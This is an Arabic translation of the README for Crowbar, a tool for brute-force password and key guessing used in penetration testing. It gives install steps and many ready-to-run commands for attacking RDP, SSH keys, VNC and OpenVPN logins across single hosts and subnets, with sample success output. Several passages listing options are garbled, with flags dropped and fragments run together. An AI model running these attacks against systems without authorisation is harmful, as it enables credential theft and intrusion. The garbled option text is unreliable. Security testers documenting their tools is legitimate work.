
Crowbar هي أداة تكسير قوية يمكن استخدامها أثناء اختبارات الاختراق. تم تطويرها لدعم البروتوكولات التي لا تدعمها حاليًا thc-hydra وأدوات التكسير الشائعة الأخرى.
Crowbar (المعروف سابقًا باسم Levye) هي أداة تخمين القوة الغاشمة يمكن استخدامها أثناء اختبارات الاختراق. تم تطويرها لتخمين بعض البروتوكولات بطريقة مختلفة مقارنة بأدوات تخمين القوة الغاشمة الشائعة الأخرى. على سبيل المثال، بينما تستخدم معظم أدوات تخمين القوة الغاشمة اسم المستخدم وكلمة المرور لتخمين SSH، يستخدم Crowbar مفتاح (مفاتيح) SSH. وهذا يسمح باستخدام أي مفاتيح خاصة تم الحصول عليها أثناء اختبارات الاختراق لمهاجمة خوادم SSH أخرى.
حاليًا يدعم Crowbar ما يلي:
-b openvpn)-b rdp)-b sshkey)-b vpn)يمكن لمستخدمي Kali Linux القيام بـ
# sudo apt install -y crowbar
أو إذا كنت ترغب في التثبيت من المصدر، قم بتثبيت جميع التبعيات:
Debain 9/10+ & Kali Rolling
# sudo apt install -y nmap openvpn freerdp2-x11 tigervnc-viewer python3 python3-pip
Debain 7/8 & Kali 1/2
# sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer
ثم احصل على أحدث إصدار من GitHub:
# git clone https://github.com/galkan/crowbar
# cd crowbar/
# pip3 install -r requirements.txt
ملاحظة: حزمة عميل RDP تعتمد على نظام التشغيل الخاص بك:
freerdp2-x11freerdp-x11.xfreerdp.freerdp باتباع: http://opentechnotes.blogspot.co.uk/2015/02/compile-headless-freerdp-credential-checking.htmlلا تنس تعديل ./lib/main.py للإشارة إلى الملف الثنائي الجديد!
openvpn, rdp, sshkey, vnckey</path/to/file> لقائمة كلمات المرور-s/-S) قبل محاولة التخمين. سيكتشف هذا ما إذا كان منفذ الهدف مفتوحًا.</path/to/file-or-folder> لملفات المفاتيح (لـ SSH أو VNC)</path/to/file> لتخزين ملف السجل (الافتراضي هو ./crowbar.log)</path/to/file> لملف تكوين OpenVPNإذا كنت تريد رؤية جميع خيارات الاستخدام، يرجى استخدام: ./crowbar.py --help.
انتباه: إذا كنت تريد استخدام اسم مستخدم يتضمن DOMAIN، فيرجى تحديد اسم المستخدم كما هو موضح أدناه. الشرطة المائلة للخلف (\) هي حرف الهروب في بايثون. لذا يجب عليك استخدام إحدى الصيغتين التاليتين:
# ./crowbar.py -b rdp -u DOMAIN\\gokhan alkan -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:03:39 RDP-SUCCESS : 10.68.35.150:3389 - "DOMAIN\gokhan alkan":Aa123456,
# ./crowbar.py -b rdp -u gokhan alkan@ornek -c Aa123456 -s 10.68.35.150/32
2015-03-28 11:04:00 RDP-SUCCESS : 10.68.35.150:3389 - "gokhan alkan@DOMAIN":Aa123456,
فيما يلي بعض الأمثلة على مهاجمة RDP باستخدام Crowbar.
تخمين RDP لعنوان IP واحد باستخدام اسم مستخدم واحد وكلمة مرور واحدة:
# ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

تخمين RDP لعنوان IP واحد باستخدام ملف قائمة أسماء المستخدمين وكلمة مرور واحدة:
# ./crowbar.py -b rdp -s 192.168.2.211/32 -U ~/Desktop/userlist -c passw0rd

تخمين RDP لعنوان IP واحد باستخدام اسم مستخدم واحد وقائمة كلمات مرور:
# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist

تخمين RDP لشبكة فرعية باستخدام قائمة أسماء المستخدمين وقائمة كلمات المرور في وضع الاكتشاف:
# ./crowbar.py -b rdp -s 192.168.2.0/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d

فيما يلي بعض الأمثلة التي يمكنك استخدامها مع Crowbar.
محاولة تخمين مفتاح SSH لعنوان IP واحد باستخدام اسم مستخدم واحد ومفتاح SSH خاص واحد:
# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/id_rsa

محاولة تخمين مفتاح SSH لعنوان IP واحد باستخدام اسم مستخدم واحد وجميع مفاتيح SSH في مجلد:
# ./crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k ~/.ssh/

محاولة تخمين مفتاح SSH لشبكة فرعية باستخدام اسم مستخدم واحد وجميع مفاتيح SSH في مجلد في وضع الاكتشاف:
# ./crowbar.py -b sshkey -s 192.168.2.0/24 -u root -k ~/.ssh/ -d

فيما يلي مثال على مهاجمة خدمة VNC باستخدام Crowbar.
محاولة تخمين VNC لعنوان IP واحد باستخدام ملف كلمة مرور مع رقم منفذ محدد:
# ./crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k ~/.vnc/passwd

فيما يلي مثال على مهاجمة OpenVPN باستخدام Crowbar.
محاولة تخمين OpenVPN لعنوان IP واحد باستخدام ملف تكوين واسم مستخدم واحد وكلمة مرور واحدة مع رقم منفذ محدد وملف شهادة اختياري. لا يهم إذا كان TCP أو UDP:
# grep remote ~/Desktop/vpnbook.ovpn
remote vpn.example.com 1194 udp
# host vpn.example.com | awk '{print $1}'
198.7.62.204
# grep '^auth-user-pass' ~/Desktop/vpnbook.ovpn
# ./crowbar.py -b openvpn -s 198.7.62.204/32 -p 1194 -m ~/Desktop/vpnbook.ovpn -k ~/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF

بمجرد تنفيذ Crowbar، يقوم بإنشاء ملفين للتسجيل والنتائج موجودين في الدليل الحالي. اسم ملف السجل الافتراضي هو crowbar.log الذي يخزن جميع محاولات التخمين أثناء التنفيذ. إذا كنت لا ترغب في استخدام ملف السجل الافتراضي، فيجب عليك استخدام -l log_path. الملف الثاني هو crowbar.out الذي يخزن المحاولات الناجحة أثناء التنفيذ. إذا كنت لا ترغب في استخدام ملف الإخراج الافتراضي، فيجب عليك استخدام -o output_path. بعد ذلك يمكنك مراقبة عمليات Crowbar.
يمكنك جعل الإخراج أكثر تفصيلاً باستخدام -v، أو يمكن عرض المزيد من المعلومات باستخدام -vv. إذا كنت تحاول استكشاف مشكلة أو خطأ محتمل، فإن استخدام -D سيمكن وضع التصحيح وسيعطي الكثير من المخرجات.
</path/to/file>./crowbar.out</path/to/file> الذي يخزن عناوين IP الهدف</path/to/file> الذي يخزن قائمة أسماء المستخدمين